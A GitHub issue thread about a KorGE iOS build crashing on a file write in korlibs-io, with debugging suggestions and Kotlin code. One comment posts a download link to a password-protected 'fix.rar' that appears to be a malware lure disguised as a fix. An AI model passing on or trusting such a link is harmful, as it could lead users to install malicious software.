### ISSUE TITLE
iOS Build Doesn't Work

### ISSUE THREAD

**Issue by gmitch215** [korlibs/korge#2284]
**Main Issue**

The KorGE iOS Build doesn't function correctly. Opening the app on my phone makes it instantly crash, causing a `SIGABRT`.

The issue seems to be in `korlibs-io`, where the app lacks permissions for storage. The app works correctly on JVM (Desktop) and Android, so it might be something with the Kotlin/Native wrapper.

I built it with `gradlew build` and opened `build/platforms/ios` in XCode. I archived and properly signed it to TestFlight. I also had to manually fix the other issues that are below this one.

Full Error:
https://hasteb.in/nv10iAKl7js8Qpi

Relevant Code:
```kts
val root: VfsFile = applicationDataVfs["combinatory_data"]

val settingsFile: VfsFile = root["settings.json"]

@Suppress("unchecked_cast")
suspend fun loadSettings() {
    // 'root' will exist at this point
    if (!settingsFile.exists())
        settingsFile.writeString("{}")

    // ...
}
```

**Other Issues**: 
- `icon80.png` doesn't exist and isn't used anymore, and should be replaced with `icon87.png`.
- `icon1024.png` can't be transparent or have an alpha channel, so I copied it and turned it off.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by gmitch215** [comment]
What?

**Comment by soywiz** [comment]
Do the crash reproduces on the simulator? I tried the simulator right now and it seems to work properly (at least the hello world)

**Comment by gmitch215** [comment]
The crash is related to the write function in `korlibs-io`. Does the hello world project use that?

**Comment by soywiz** [comment]
Nope, no write in the hello-world, but does reading for the image.

Can you put a try...catch. Does the `combinatory_data` folder exists in the `applicationDataVfs`?

ensureParents would create ancestor folders if required:

```kotlin
settingsFile.ensureParents().writeString("...")
```

**Comment by gmitch215** [comment]
I'll attempt with a `try/catch`. And yes, `combinatory_data` and `root` exist at that point, but I'll try with `ensureParents`.

Can you try the iOS simulator with a write function?

**Comment by soywiz** [comment]
<img width="1496" alt="Screenshot 2024-08-27 at 15 27 33" src="https://github.com/user-attachments/assets/c615b3b3-559d-429f-bc7e-34e04b5f4027">

Throws an exception (if the file doesn't exist) but doesn't crashes.

```bash
./gradlew runIosSimulatorDebug
```

**Comment by gmitch215** [comment]
I'll try it in the `CREATE` stream mode when possible. The Exception might be causing the `SIGABRT`.

It's weird that this only happens on iOS. I don't get this kind of behavior on Android or on Desktop.

Would you happen to have access to an iPhone & Apple Developer Account you can test on? I probably won't be able to re-test it for a few hours.

**Comment by gmitch215** [comment]
Tried `create`, getting a similar stacktrace.

**New Stacktrace**: https://hasteb.in/w23F20yUyevf33L

**Relevant Code**

```kotlin
suspend fun main() = Korge(
    gameId = ID,
    title = TITLE,
    windowSize = SIZE,
    backgroundColor = MAIN_COLOR,
    icon = ICON
) {
    container = sceneContainer(defaultTransition = TRANSITION)
    container.addTo(this)
    loadingSequence(this)
}
```

```kotlin
suspend fun loadingSequence(stage: Stage) {
    // ...
    // I/O
    loaded = withContext(Dispatchers.CIO) {
        // Storage
        if (!root.exists()) root.mkdirs()

        loadSettings()
        // ...
    }
}
```

```kotlin
val root: VfsFile = applicationDataVfs["combinatory_data"]

val settingsFile: VfsFile = root["settings.json"]

@Suppress("unchecked_cast")
suspend fun loadSettings() {
    if (!settingsFile.exists())
        settingsFile.open(VfsOpenMode.CREATE).use { it.writeString("{}") }

    val json = Json.parse(settingsFile.readString()) as Map<String, Any>
    Setting.load(json)
}
```

**Comment by gmitch215** [comment]
@soywiz Any updates?

**Comment by soywiz** [comment]
I'm on an hiatus and won't code or check messages in that time; will return around ~ early December.

**Comment by gmitch215** [comment]
@soywiz Any updates?

**Comment by gmitch215** [comment]
@soywiz Pinging you once again.

**Comment by soywiz** [comment]
@gmitch215 thanks for your patience. I don't have an iphone anymore, so I cannot test myself.

But could you call `settingsFile.getUnderlyingUnscapedFile()` and print it either on the screen or the terminal instead of writing to figure out the path?

**Comment by soywiz** [comment]
@gmitch215 I'm going to check stuff in the coming weeks. Did you tried it in the end by chance?

**Comment by gmitch215** [comment]
@soywiz Apologies for the late response. I've been away from an Apple computer for a bit and have only recently started using it again.

I've been unable to figure out how to print the requested paths to the screen, becuase `println` is not included in the error stack trace. Can you give me some sample code to work with?
